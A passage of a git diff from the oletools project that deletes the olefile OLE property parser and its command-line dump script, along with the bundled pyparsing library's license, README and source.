- # a fatal error when parsing the whole file
- msg = 'Error while parsing properties header in stream %s: %s' % (
- repr(streampath), exc)
- self._raise_defect(DEFECT_INCORRECT, msg, type(exc))
- return data
-
- # clamp num_props based on the data length
- num_props = min(num_props, len(s) / 8)
-
- for i in iterrange(num_props):
- property_id = 0 # just in case of an exception
- try:
- property_id = i32(s, 8+i*8)
- offset = i32(s, 12+i*8)
- property_type = i32(s, offset)
-
- log.debug('property id=%d: type=%d offset=%X' % (property_id, property_type, offset))
-
- # test for common types first (should perhaps use
- # a dictionary instead?)
-
- if property_type == VT_I2: # 16-bit signed integer
- value = i16(s, offset+4)
- if value >= 32768:
- value = value - 65536
- elif property_type == VT_UI2: # 2-byte unsigned integer
- value = i16(s, offset+4)
- elif property_type in (VT_I4, VT_INT, VT_ERROR):
- # VT_I4: 32-bit signed integer
- # VT_ERROR: HRESULT, similar to 32-bit signed integer,
- # see https://msdn.microsoft.com/en-us/library/cc230330.aspx
- value = i32(s, offset+4)
- elif property_type in (VT_UI4, VT_UINT): # 4-byte unsigned integer
- value = i32(s, offset+4) # FIXME
- elif property_type in (VT_BSTR, VT_LPSTR):
- # CodePageString, see https://msdn.microsoft.com/en-us/library/dd942354.aspx
- # size is a 32 bits integer, including the null terminator, and
- # possibly trailing or embedded null chars
- #TODO: if codepage is unicode, the string should be converted as such
- count = i32(s, offset+4)
- value = s[offset+8:offset+8+count-1]
- # remove all null chars:
- value = value.replace(b'\x00', b'')
- elif property_type == VT_BLOB:
- # binary large object (BLOB)
- # see https://msdn.microsoft.com/en-us/library/dd942282.aspx
- count = i32(s, offset+4)
- value = s[offset+8:offset+8+count]
- elif property_type == VT_LPWSTR:
- # UnicodeString
- # see https://msdn.microsoft.com/en-us/library/dd942313.aspx
- # "the string should NOT contain embedded or additional trailing
- # null characters."
- count = i32(s, offset+4)
- value = self._decode_utf16_str(s[offset+8:offset+8+count*2])
- elif property_type == VT_FILETIME:
- value = long(i32(s, offset+4)) + (long(i32(s, offset+8))<<32)
- # FILETIME is a 64-bit int: "number of 100ns periods
- # since Jan 1,1601".
- if convert_time and property_id not in no_conversion:
- log.debug('Converting property #%d to python datetime, value=%d=%fs'
- %(property_id, value, float(value)/10000000))
- # convert FILETIME to Python datetime.datetime
- # inspired from https://code.activestate.com/recipes/511425-filetime-to-datetime/
- _FILETIME_null_date = datetime.datetime(1601, 1, 1, 0, 0, 0)
- log.debug('timedelta days=%d' % (value//(10*1000000*3600*24)))
- value = _FILETIME_null_date + datetime.timedelta(microseconds=value//10)
- else:
- # legacy code kept for backward compatibility: returns a
- # number of seconds since Jan 1,1601
- value = value // 10000000 # seconds
- elif property_type == VT_UI1: # 1-byte unsigned integer
- value = i8(s[offset+4])
- elif property_type == VT_CLSID:
- value = _clsid(s[offset+4:offset+20])
- elif property_type == VT_CF:
- # PropertyIdentifier or ClipboardData??
- # see https://msdn.microsoft.com/en-us/library/dd941945.aspx
- count = i32(s, offset+4)
- value = s[offset+8:offset+8+count]
- elif property_type == VT_BOOL:
- # VARIANT_BOOL, 16 bits bool, 0x0000=Fals, 0xFFFF=True
- # see https://msdn.microsoft.com/en-us/library/cc237864.aspx
- value = bool(i16(s, offset+4))
- else:
- value = None # everything else yields "None"
- log.debug('property id=%d: type=%d not implemented in parser yet' % (property_id, property_type))
-
- # missing: VT_EMPTY, VT_NULL, VT_R4, VT_R8, VT_CY, VT_DATE,
- # VT_DECIMAL, VT_I1, VT_I8, VT_UI8,
- # see https://msdn.microsoft.com/en-us/library/dd942033.aspx
-
- # FIXME: add support for VT_VECTOR
- # VT_VECTOR is a 32 uint giving the number of items, followed by
- # the items in sequence. The VT_VECTOR value is combined with the
- # type of items, e.g. VT_VECTOR|VT_BSTR
- # see https://msdn.microsoft.com/en-us/library/dd942011.aspx
-
- #print("%08x" % property_id, repr(value), end=" ")
- #print("(%s)" % VT[i32(s, offset) & 0xFFF])
-
- data[property_id] = value
- except BaseException as exc:
- # catch exception while parsing each property, and only raise
- # a DEFECT_INCORRECT, because parsing can go on
- msg = 'Error while parsing property id %d in stream %s: %s' % (
- property_id, repr(streampath), exc)
- self._raise_defect(DEFECT_INCORRECT, msg, type(exc))
-
- return data
-
- def get_metadata(self):
- """
- Parse standard properties streams, return an OleMetadata object
- containing all the available metadata.
- (also stored in the metadata attribute of the OleFileIO object)
-
- new in version 0.25
- """
- self.metadata = OleMetadata()
- self.metadata.parse_properties(self)
- return self.metadata
-
-#
-# --------------------------------------------------------------------
-# This script can be used to dump the directory of any OLE2 structured
-# storage file.
-
-if __name__ == "__main__":
-
- import sys, optparse
-
- DEFAULT_LOG_LEVEL = "warning" # Default log level
- LOG_LEVELS = {
- 'debug': logging.DEBUG,
- 'info': logging.INFO,
- 'warning': logging.WARNING,
- 'error': logging.ERROR,
- 'critical': logging.CRITICAL
- }
-
- usage = 'usage: %prog [options] [filename2 ...]'
- parser = optparse.OptionParser(usage=usage)
- parser.add_option("-c", action="store_true", dest="check_streams",
- help='check all streams (for debugging purposes)')
- parser.add_option("-d", action="store_true", dest="debug_mode",
- help='debug mode, shortcut for -l debug (displays a lot of debug information, for developers only)')
- parser.add_option('-l', '--loglevel', dest="loglevel", action="store", default=DEFAULT_LOG_LEVEL,
- help="logging level debug/info/warning/error/critical (default=%default)")
-
- (options, args) = parser.parse_args()
-
- print('olefile version %s %s - https://www.decalage.info/en/olefile\n' % (__version__, __date__))
-
- # Print help if no arguments are passed
- if len(args) == 0:
- print(__doc__)
- parser.print_help()
- sys.exit()
-
- if options.debug_mode:
- options.loglevel = 'debug'
-
- # setup logging to the console
- logging.basicConfig(level=LOG_LEVELS[options.loglevel], format='%(levelname)-8s %(message)s')
-
- # also enable the module's logger:
- enable_logging()
-
- for filename in args:
- try:
- ole = OleFileIO(filename)#, raise_defects=DEFECT_INCORRECT)
- print("-" * 68)
- print(filename)
- print("-" * 68)
- ole.dumpdirectory()
- for streamname in ole.listdir():
- if streamname[-1][0] == "\005":
- print("%r: properties" % streamname)
- try:
- props = ole.getproperties(streamname, convert_time=True)
- props = sorted(props.items())
- for k, v in props:
- #[PL]: avoid to display too large or binary values:
- if isinstance(v, (basestring, bytes)):
- if len(v) > 50:
- v = v[:50]
- if isinstance(v, bytes):
- # quick and dirty binary check:
- for c in (1,2,3,4,5,6,7,11,12,14,15,16,17,18,19,20,
- 21,22,23,24,25,26,27,28,29,30,31):
- if c in bytearray(v):
- v = '(binary data)'
- break
- print(" ", k, v)
- except:
- log.exception('Error while parsing property stream %r' % streamname)
-
- if options.check_streams:
- # Read all streams to check if there are errors:
- print('\nChecking streams...')
- for streamname in ole.listdir():
- # print name using repr() to convert binary chars to \xNN:
- print('-', repr('/'.join(streamname)),'-', end=' ')
- st_type = ole.get_type(streamname)
- if st_type == STGTY_STREAM:
- print('size %d' % ole.get_size(streamname))
- # just try to read stream in memory:
- ole.openstream(streamname)
- else:
- print('NOT a stream : type=%d' % st_type)
- print()
-
-## for streamname in ole.listdir():
-## # print name using repr() to convert binary chars to \xNN:
-## print('-', repr('/'.join(streamname)),'-', end=' ')
-## print(ole.getmtime(streamname))
-## print()
-
- print('Modification/Creation times of all directory entries:')
- for entry in ole.direntries:
- if entry is not None:
- print('- %s: mtime=%s ctime=%s' % (entry.name,
- entry.getmtime(), entry.getctime()))
- print()
-
- # parse and display metadata:
- try:
- meta = ole.get_metadata()
- meta.dump()
- except:
- log.exception('Error while parsing metadata')
- print()
- #[PL] Test a few new methods:
- root = ole.get_rootentry_name()
- print('Root entry name: "%s"' % root)
- if ole.exists('worddocument'):
- print("This is a Word document.")
- print("type of stream 'WordDocument':", ole.get_type('worddocument'))
- print("size :", ole.get_size('worddocument'))
- if ole.exists('macros/vba'):
- print("This document may contain VBA macros.")
-
- # print parsing issues:
- print('\nNon-fatal issues raised during parsing:')
- if ole.parsing_issues:
- for exctype, msg in ole.parsing_issues:
- print('- %s: %s' % (exctype.__name__, msg))
- else:
- print('None')
- except:
- log.exception('Error while parsing file %r' % filename)
-
-# this code was developed while listening to The Wedding Present "Sea Monsters"
diff --git a/oletools/thirdparty/pyparsing/LICENSE b/oletools/thirdparty/pyparsing/LICENSE
deleted file mode 100644
index bbc959e0..00000000
--- a/oletools/thirdparty/pyparsing/LICENSE
+++ /dev/null
@@ -1,18 +0,0 @@
-Permission is hereby granted, free of charge, to any person obtaining
-a copy of this software and associated documentation files (the
-"Software"), to deal in the Software without restriction, including
-without limitation the rights to use, copy, modify, merge, publish,
-distribute, sublicense, and/or sell copies of the Software, and to
-permit persons to whom the Software is furnished to do so, subject to
-the following conditions:
-
-The above copyright notice and this permission notice shall be
-included in all copies or substantial portions of the Software.
-
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
-EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
-MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
-IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
-CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
-TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
-SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
diff --git a/oletools/thirdparty/pyparsing/README b/oletools/thirdparty/pyparsing/README
deleted file mode 100644
index 44dd51f2..00000000
--- a/oletools/thirdparty/pyparsing/README
+++ /dev/null
@@ -1,72 +0,0 @@
-====================================
-PyParsing -- A Python Parsing Module
-====================================
-
-Introduction
-============
-
-The pyparsing module is an alternative approach to creating and executing
-simple grammars, vs. the traditional lex/yacc approach, or the use of
-regular expressions. The pyparsing module provides a library of classes
-that client code uses to construct the grammar directly in Python code.
-
-Here is a program to parse "Hello, World!" (or any greeting of the form
-", !"):
-
- from pyparsing import Word, alphas
- greet = Word( alphas ) + "," + Word( alphas ) + "!"
- hello = "Hello, World!"
- print hello, "->", greet.parseString( hello )
-
-The program outputs the following:
-
- Hello, World! -> ['Hello', ',', 'World', '!']
-
-The Python representation of the grammar is quite readable, owing to the
-self-explanatory class names, and the use of '+', '|' and '^' operator
-definitions.
-
-The parsed results returned from parseString() can be accessed as a
-nested list, a dictionary, or an object with named attributes.
-
-The pyparsing module handles some of the problems that are typically
-vexing when writing text parsers:
-- extra or missing whitespace (the above program will also handle
- "Hello,World!", "Hello , World !", etc.)
-- quoted strings
-- embedded comments
-
-The .zip file includes examples of a simple SQL parser, simple CORBA IDL
-parser, a config file parser, a chemical formula parser, and a four-
-function algebraic notation parser. It also includes a simple how-to
-document, and a UML class diagram of the library's classes.
-
-
-
-Installation
-============
-
-Do the usual:
-
- python setup.py install
-
-(pyparsing requires Python 2.3.2 or later.)
-
-
-Documentation
-=============
-
-See:
-
- HowToUsePyparsing.html
-
-
-License
-=======
-
- MIT License. See header of pyparsing.py
-
-History
-=======
-
- See CHANGES file.
diff --git a/oletools/thirdparty/pyparsing/pyparsing.py b/oletools/thirdparty/pyparsing/pyparsing.py
deleted file mode 100644
index 7b82f715..00000000
--- a/oletools/thirdparty/pyparsing/pyparsing.py
+++ /dev/null
@@ -1,3764 +0,0 @@
-# module pyparsing.py
-#
-# Copyright (c) 2003-2013 Paul T. McGuire
-#
-# Permission is hereby granted, free of charge, to any person obtaining
-# a copy of this software and associated documentation files (the
-# "Software"), to deal in the Software without restriction, including
-# without limitation the rights to use, copy, modify, merge, publish,
-# distribute, sublicense, and/or sell copies of the Software, and to
-# permit persons to whom the Software is furnished to do so, subject to
-# the following conditions:
-#
-# The above copyright notice and this permission notice shall be
-# included in all copies or substantial portions of the Software.
-#
-# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
-# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
-# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
-# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
-# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
-# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
-# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-#
-
-__doc__ = \
-"""
-pyparsing module - Classes and methods to define and execute parsing grammars
-
-The pyparsing module is an alternative approach to creating and executing simple grammars,
-vs. the traditional lex/yacc approach, or the use of regular expressions. With pyparsing, you
-don't need to learn a new syntax for defining grammars or matching expressions - the parsing module
-provides a library of classes that you use to construct the grammar directly in Python.
-
-Here is a program to parse "Hello, World!" (or any greeting of the form C{", !"})::
-
- from pyparsing import Word, alphas
-
- # define grammar of a greeting
- greet = Word( alphas ) + "," + Word( alphas ) + "!"
-
- hello = "Hello, World!"
- print (hello, "->", greet.parseString( hello ))
-
-The program outputs the following::
-
- Hello, World! -> ['Hello', ',', 'World', '!']
-
-The Python representation of the grammar is quite readable, owing to the self-explanatory
-class names, and the use of '+', '|' and '^' operators.
-
-The parsed results returned from C{parseString()} can be accessed as a nested list, a dictionary, or an
-object with named attributes.
-
-The pyparsing module handles some of the problems that are typically vexing when writing text parsers:
- - extra or missing whitespace (the above program will also handle "Hello,World!", "Hello , World !", etc.)
- - quoted strings
- - embedded comments
-"""
-
-__version__ = "2.0.3"
-__versionTime__ = "16 Aug 2014 00:12"
-__author__ = "Paul McGuire "
-
-import string
-from weakref import ref as wkref
-import copy
-import sys
-import warnings
-import re
-import sre_constants
-import collections
-import pprint
-#~ sys.stderr.write( "testing pyparsing module, version %s, %s\n" % (__version__,__versionTime__ ) )
-
-__all__ = [
-'And', 'CaselessKeyword', 'CaselessLiteral', 'CharsNotIn', 'Combine', 'Dict', 'Each', 'Empty',
-'FollowedBy', 'Forward', 'GoToColumn', 'Group', 'Keyword', 'LineEnd', 'LineStart', 'Literal',
-'MatchFirst', 'NoMatch', 'NotAny', 'OneOrMore', 'OnlyOnce', 'Optional', 'Or',
-'ParseBaseException', 'ParseElementEnhance', 'ParseException', 'ParseExpression', 'ParseFatalException',
-'ParseResults', 'ParseSyntaxException', 'ParserElement', 'QuotedString', 'RecursiveGrammarException',
-'Regex', 'SkipTo', 'StringEnd', 'StringStart', 'Suppress', 'Token', 'TokenConverter', 'Upcase',
-'White', 'Word', 'WordEnd', 'WordStart', 'ZeroOrMore',
-'alphanums', 'alphas', 'alphas8bit', 'anyCloseTag', 'anyOpenTag', 'cStyleComment', 'col',
-'commaSeparatedList', 'commonHTMLEntity', 'countedArray', 'cppStyleComment', 'dblQuotedString',
-'dblSlashComment', 'delimitedList', 'dictOf', 'downcaseTokens', 'empty', 'hexnums',
-'htmlComment', 'javaStyleComment', 'keepOriginalText', 'line', 'lineEnd', 'lineStart', 'lineno',
-'makeHTMLTags', 'makeXMLTags', 'matchOnlyAtCol', 'matchPreviousExpr', 'matchPreviousLiteral',
-'nestedExpr', 'nullDebugAction', 'nums', 'oneOf', 'opAssoc', 'operatorPrecedence', 'printables',
-'punc8bit', 'pythonStyleComment', 'quotedString', 'removeQuotes', 'replaceHTMLEntity',
-'replaceWith', 'restOfLine', 'sglQuotedString', 'srange', 'stringEnd',
-'stringStart', 'traceParseAction', 'unicodeString', 'upcaseTokens', 'withAttribute',
-'indentedBlock', 'originalTextFor', 'ungroup', 'infixNotation','locatedExpr',
-]
-
-PY_3 = sys.version.startswith('3')
-if PY_3:
- _MAX_INT = sys.maxsize
- basestring = str
- unichr = chr
- _ustr = str
-
- # build list of single arg builtins, that can be used as parse actions
- singleArgBuiltins = [sum, len, sorted, reversed, list, tuple, set, any, all, min, max]
-
-else:
- _MAX_INT = sys.maxint
- range = xrange
-
- def _ustr(obj):
- """Drop-in replacement for str(obj) that tries to be Unicode friendly. It first tries
- str(obj). If that fails with a UnicodeEncodeError, then it tries unicode(obj). It
- then < returns the unicode object | encodes it with the default encoding | ... >.
- """
- if isinstance(obj,unicode):
- return obj
-
- try:
- # If this works, then _ustr(obj) has the same behaviour as str(obj), so
- # it won't break any existing code.
- return str(obj)
-
- except UnicodeEncodeError:
- # The Python docs (http://docs.python.org/ref/customization.html#l2h-182)
- # state that "The return value must be a string object". However, does a
- # unicode object (being a subclass of basestring) count as a "string
- # object"?
- # If so, then return a unicode object:
- return unicode(obj)
- # Else encode it... but how? There are many choices... :)
- # Replace unprintables with escape codes?
- #return unicode(obj).encode(sys.getdefaultencoding(), 'backslashreplace_errors')
- # Replace unprintables with question marks?
- #return unicode(obj).encode(sys.getdefaultencoding(), 'replace')
- # ...
-
- # build list of single arg builtins, tolerant of Python version, that can be used as parse actions
- singleArgBuiltins = []
- import __builtin__
- for fname in "sum len sorted reversed list tuple set any all min max".split():
- try:
- singleArgBuiltins.append(getattr(__builtin__,fname))
- except AttributeError:
- continue
-
-_generatorType = type((y for y in range(1)))
-
-def _xml_escape(data):
- """Escape &, <, >, ", ', etc. in a string of data."""
-
- # ampersand must be replaced first
- from_symbols = '&><"\''
- to_symbols = ('&'+s+';' for s in "amp gt lt quot apos".split())
- for from_,to_ in zip(from_symbols, to_symbols):
- data = data.replace(from_, to_)
- return data
-
-class _Constants(object):
- pass
-
-alphas = string.ascii_lowercase + string.ascii_uppercase
-nums = "0123456789"
-hexnums = nums + "ABCDEFabcdef"
-alphanums = alphas + nums
-_bslash = chr(92)
-printables = "".join(c for c in string.printable if c not in string.whitespace)
-
-class ParseBaseException(Exception):
- """base exception class for all parsing runtime exceptions"""
- # Performance tuning: we construct a *lot* of these, so keep this
- # constructor as small and fast as possible
- def __init__( self, pstr, loc=0, msg=None, elem=None ):
- self.loc = loc
- if msg is None:
- self.msg = pstr
- self.pstr = ""
- else:
- self.msg = msg
- self.pstr = pstr
- self.parserElement = elem
-
- def __getattr__( self, aname ):
- """supported attributes by name are:
- - lineno - returns the line number of the exception text
- - col - returns the column number of the exception text
- - line - returns the line containing the exception text
- """
- if( aname == "lineno" ):
- return lineno( self.loc, self.pstr )
- elif( aname in ("col", "column") ):
- return col( self.loc, self.pstr )
- elif( aname == "line" ):
- return line( self.loc, self.pstr )
- else:
- raise AttributeError(aname)
-
- def __str__( self ):
- return "%s (at char %d), (line:%d, col:%d)" % \
- ( self.msg, self.loc, self.lineno, self.column )
- def __repr__( self ):
- return _ustr(self)
- def markInputline( self, markerString = ">!<" ):
- """Extracts the exception line from the input string, and marks
- the location of the exception with a special symbol.
- """
- line_str = self.line
- line_column = self.column - 1
- if markerString:
- line_str = "".join((line_str[:line_column],
- markerString, line_str[line_column:]))
- return line_str.strip()
- def __dir__(self):
- return "loc msg pstr parserElement lineno col line " \
- "markInputline __str__ __repr__".split()
-
-class ParseException(ParseBaseException):
- """exception thrown when parse expressions don't match class;
- supported attributes by name are:
- - lineno - returns the line number of the exception text
- - col - returns the column number of the exception text
- - line - returns the line containing the exception text
- """
- pass
-
-class ParseFatalException(ParseBaseException):
- """user-throwable exception thrown when inconsistent parse content
- is found; stops all parsing immediately"""
- pass
-
-class ParseSyntaxException(ParseFatalException):
- """just like C{L{ParseFatalException}}, but thrown internally when an
- C{L{ErrorStop}} ('-' operator) indicates that parsing is to stop immediately because
- an unbacktrackable syntax error has been found"""
- def __init__(self, pe):
- super(ParseSyntaxException, self).__init__(
- pe.pstr, pe.loc, pe.msg, pe.parserElement)
-
-#~ class ReparseException(ParseBaseException):
- #~ """Experimental class - parse actions can raise this exception to cause
- #~ pyparsing to reparse the input string:
- #~ - with a modified input string, and/or
- #~ - with a modified start location
- #~ Set the values of the ReparseException in the constructor, and raise the
- #~ exception in a parse action to cause pyparsing to use the new string/location.
- #~ Setting the values as None causes no change to be made.
- #~ """
- #~ def __init_( self, newstring, restartLoc ):
- #~ self.newParseText = newstring
- #~ self.reparseLoc = restartLoc
-
-class RecursiveGrammarException(Exception):
- """exception thrown by C{validate()} if the grammar could be improperly recursive"""
- def __init__( self, parseElementList ):
- self.parseElementTrace = parseElementList
-
- def __str__( self ):
- return "RecursiveGrammarException: %s" % self.parseElementTrace
-
-class _ParseResultsWithOffset(object):
- def __init__(self,p1,p2):
- self.tup = (p1,p2)
- def __getitem__(self,i):
- return self.tup[i]
- def __repr__(self):
- return repr(self.tup)
- def setOffset(self,i):
- self.tup = (self.tup[0],i)
-
-class ParseResults(object):
- """Structured parse results, to provide multiple means of access to the parsed data:
- - as a list (C{len(results)})
- - by list index (C{results[0], results[1]}, etc.)
- - by attribute (C{results.})
- """
- def __new__(cls, toklist, name=None, asList=True, modal=True ):
- if isinstance(toklist, cls):
- return toklist
- retobj = object.__new__(cls)
- retobj.__doinit = True
- return retobj
-
- # Performance tuning: we construct a *lot* of these, so keep this
- # constructor as small and fast as possible
- def __init__( self, toklist, name=None, asList=True, modal=True, isinstance=isinstance ):
- if self.__doinit:
- self.__doinit = False
- self.__name = None
- self.__parent = None
- self.__accumNames = {}
- if isinstance(toklist, list):
- self.__toklist = toklist[:]
- elif isinstance(toklist, _generatorType):
- self.__toklist = list(toklist)
- else:
- self.__toklist = [toklist]
- self.__tokdict = dict()
-
- if name is not None and name:
- if not modal:
- self.__accumNames[name] = 0
- if isinstance(name,int):
- name = _ustr(name) # will always return a str, but use _ustr for consistency
- self.__name = name
- if not (isinstance(toklist, (type(None), basestring, list)) and toklist in (None,'',[])):
- if isinstance(toklist,basestring):
- toklist = [ toklist ]
- if asList:
- if isinstance(toklist,ParseResults):
- self[name] = _ParseResultsWithOffset(toklist.copy(),0)
- else:
- self[name] = _ParseResultsWithOffset(ParseResults(toklist[0]),0)
- self[name].__name = name
- else:
- try:
- self[name] = toklist[0]
- except (KeyError,TypeError,IndexError):
- self[name] = toklist
-
- def __getitem__( self, i ):
- if isinstance( i, (int,slice) ):
- return self.__toklist[i]
- else:
- if i not in self.__accumNames:
- return self.__tokdict[i][-1][0]
- else:
- return ParseResults([ v[0] for v in self.__tokdict[i] ])
-
- def __setitem__( self, k, v, isinstance=isinstance ):
- if isinstance(v,_ParseResultsWithOffset):
- self.__tokdict[k] = self.__tokdict.get(k,list()) + [v]
- sub = v[0]
- elif isinstance(k,int):
- self.__toklist[k] = v
- sub = v
- else:
- self.__tokdict[k] = self.__tokdict.get(k,list()) + [_ParseResultsWithOffset(v,0)]
- sub = v
- if isinstance(sub,ParseResults):
- sub.__parent = wkref(self)
-
- def __delitem__( self, i ):
- if isinstance(i,(int,slice)):
- mylen = len( self.__toklist )
- del self.__toklist[i]
-
- # convert int to slice
- if isinstance(i, int):
- if i < 0:
- i += mylen
- i = slice(i, i+1)
- # get removed indices
- removed = list(range(*i.indices(mylen)))
- removed.reverse()
- # fixup indices in token dictionary
- for name in self.__tokdict:
- occurrences = self.__tokdict[name]
- for j in removed:
- for k, (value, position) in enumerate(occurrences):
- occurrences[k] = _ParseResultsWithOffset(value, position - (position > j))
- else:
- del self.__tokdict[i]
-
- def __contains__( self, k ):
- return k in self.__tokdict
-
- def __len__( self ): return len( self.__toklist )
- def __bool__(self): return len( self.__toklist ) > 0
- __nonzero__ = __bool__
- def __iter__( self ): return iter( self.__toklist )
- def __reversed__( self ): return iter( self.__toklist[::-1] )
- def iterkeys( self ):
- """Returns all named result keys."""
- if hasattr(self.__tokdict, "iterkeys"):
- return self.__tokdict.iterkeys()
- else:
- return iter(self.__tokdict)
-
- def itervalues( self ):
- """Returns all named result values."""
- return (self[k] for k in self.iterkeys())
-
- def iteritems( self ):
- return ((k, self[k]) for k in self.iterkeys())
-
- if PY_3:
- keys = iterkeys
- values = itervalues
- items = iteritems
- else:
- def keys( self ):
- """Returns all named result keys."""
- return list(self.iterkeys())
-
- def values( self ):
- """Returns all named result values."""
- return list(self.itervalues())
-
- def items( self ):
- """Returns all named result keys and values as a list of tuples."""
- return list(self.iteritems())
-
- def haskeys( self ):
- """Since keys() returns an iterator, this method is helpful in bypassing
- code that looks for the existence of any defined results names."""
- return bool(self.__tokdict)
-
- def pop( self, *args, **kwargs):
- """Removes and returns item at specified index (default=last).
- Supports both list and dict semantics for pop(). If passed no
- argument or an integer argument, it will use list semantics
- and pop tokens from the list of parsed tokens. If passed a
- non-integer argument (most likely a string), it will use dict
- semantics and pop the corresponding value from any defined
- results names. A second default return value argument is
- supported, just as in dict.pop()."""
- if not args:
- args = [-1]
- for k,v in kwargs.items():
- if k == 'default':
- args = (args[0], v)
- else:
- raise TypeError("pop() got an unexpected keyword argument '%s'" % k)
- if (isinstance(args[0], int) or
- len(args) == 1 or
- args[0] in self):
- index = args[0]
- ret = self[index]
- del self[index]
- return ret
- else:
- defaultvalue = args[1]
- return defaultvalue
-
- def get(self, key, defaultValue=None):
- """Returns named result matching the given key, or if there is no
- such name, then returns the given C{defaultValue} or C{None} if no
- C{defaultValue} is specified."""
- if key in self:
- return self[key]
- else:
- return defaultValue
-
- def insert( self, index, insStr ):
- """Inserts new element at location index in the list of parsed tokens."""
- self.__toklist.insert(index, insStr)
- # fixup indices in token dictionary
- for name in self.__tokdict:
- occurrences = self.__tokdict[name]
- for k, (value, position) in enumerate(occurrences):
- occurrences[k] = _ParseResultsWithOffset(value, position + (position > index))
-
- def append( self, item ):
- """Add single element to end of ParseResults list of elements."""
- self.__toklist.append(item)
-
- def extend( self, itemseq ):
- """Add sequence of elements to end of ParseResults list of elements."""
- if isinstance(itemseq, ParseResults):
- self += itemseq
- else:
- self.__toklist.extend(itemseq)
-
- def clear( self ):
- """Clear all elements and results names."""
- del self.__toklist[:]
- self.__tokdict.clear()
-
- def __getattr__( self, name ):
- try:
- return self[name]
- except KeyError:
- return ""
-
- if name in self.__tokdict:
- if name not in self.__accumNames:
- return self.__tokdict[name][-1][0]
- else:
- return ParseResults([ v[0] for v in self.__tokdict[name] ])
- else:
- return ""
-
- def __add__( self, other ):
- ret = self.copy()
- ret += other
- return ret
-
- def __iadd__( self, other ):
- if other.__tokdict:
- offset = len(self.__toklist)
- addoffset = ( lambda a: (a<0 and offset) or (a+offset) )
- otheritems = other.__tokdict.items()
- otherdictitems = [(k, _ParseResultsWithOffset(v[0],addoffset(v[1])) )
- for (k,vlist) in otheritems for v in vlist]
- for k,v in otherdictitems:
- self[k] = v
- if isinstance(v[0],ParseResults):
- v[0].__parent = wkref(self)
-
- self.__toklist += other.__toklist
- self.__accumNames.update( other.__accumNames )
- return self
-
- def __radd__(self, other):
- if isinstance(other,int) and other == 0:
- return self.copy()
-
- def __repr__( self ):
- return "(%s, %s)" % ( repr( self.__toklist ), repr( self.__tokdict ) )
-
- def __str__( self ):
- out = []
- for i in self.__toklist:
- if isinstance(i, ParseResults):
- out.append(_ustr(i))
- else:
- out.append(repr(i))
- return '[' + ', '.join(out) + ']'
-
- def _asStringList( self, sep='' ):
- out = []
- for item in self.__toklist:
- if out and sep:
- out.append(sep)
- if isinstance( item, ParseResults ):
- out += item._asStringList()
- else:
- out.append( _ustr(item) )
- return out
-
- def asList( self ):
- """Returns the parse results as a nested list of matching tokens, all converted to strings."""
- out = []
- for res in self.__toklist:
- if isinstance(res,ParseResults):
- out.append( res.asList() )
- else:
- out.append( res )
- return out
-
- def asDict( self ):
- """Returns the named parse results as dictionary."""
- if PY_3:
- return dict( self.items() )
- else:
- return dict( self.iteritems() )
-
- def copy( self ):
- """Returns a new copy of a C{ParseResults} object."""
- ret = ParseResults( self.__toklist )
- ret.__tokdict = self.__tokdict.copy()
- ret.__parent = self.__parent
- ret.__accumNames.update( self.__accumNames )
- ret.__name = self.__name
- return ret
-
- def asXML( self, doctag=None, namedItemsOnly=False, indent="", formatted=True ):
- """Returns the parse results as XML. Tags are created for tokens and lists that have defined results names."""
- nl = "\n"
- out = []
- namedItems = dict((v[1],k) for (k,vlist) in self.__tokdict.items()
- for v in vlist)
- nextLevelIndent = indent + " "
-
- # collapse out indents if formatting is not desired
- if not formatted:
- indent = ""
- nextLevelIndent = ""
- nl = ""
-
- selfTag = None
- if doctag is not None:
- selfTag = doctag
- else:
- if self.__name:
- selfTag = self.__name
-
- if not selfTag:
- if namedItemsOnly:
- return ""
- else:
- selfTag = "ITEM"
-
- out += [ nl, indent, "<", selfTag, ">" ]
-
- worklist = self.__toklist
- for i,res in enumerate(worklist):
- if isinstance(res,ParseResults):
- if i in namedItems:
- out += [ res.asXML(namedItems[i],
- namedItemsOnly and doctag is None,
- nextLevelIndent,
- formatted)]
- else:
- out += [ res.asXML(None,
- namedItemsOnly and doctag is None,
- nextLevelIndent,
- formatted)]
- else:
- # individual token, see if there is a name for it
- resTag = None
- if i in namedItems:
- resTag = namedItems[i]
- if not resTag:
- if namedItemsOnly:
- continue
- else:
- resTag = "ITEM"
- xmlBodyText = _xml_escape(_ustr(res))
- out += [ nl, nextLevelIndent, "<", resTag, ">",
- xmlBodyText,
- "", resTag, ">" ]
-
- out += [ nl, indent, "", selfTag, ">" ]
- return "".join(out)
-
- def __lookup(self,sub):
- for k,vlist in self.__tokdict.items():
- for v,loc in vlist:
- if sub is v:
- return k
- return None
-
- def getName(self):
- """Returns the results name for this token expression."""
- if self.__name:
- return self.__name
- elif self.__parent:
- par = self.__parent()
- if par:
- return par.__lookup(self)
- else:
- return None
- elif (len(self) == 1 and
- len(self.__tokdict) == 1 and
- self.__tokdict.values()[0][0][1] in (0,-1)):
- return self.__tokdict.keys()[0]
- else:
- return None
-
- def dump(self,indent='',depth=0):
- """Diagnostic method for listing out the contents of a C{ParseResults}.
- Accepts an optional C{indent} argument so that this string can be embedded
- in a nested display of other data."""
- out = []
- NL = '\n'
- out.append( indent+_ustr(self.asList()) )
- items = sorted(self.items())
- for k,v in items:
- if out:
- out.append(NL)
- out.append( "%s%s- %s: " % (indent,(' '*depth), k) )
- if isinstance(v,ParseResults):
- if v:
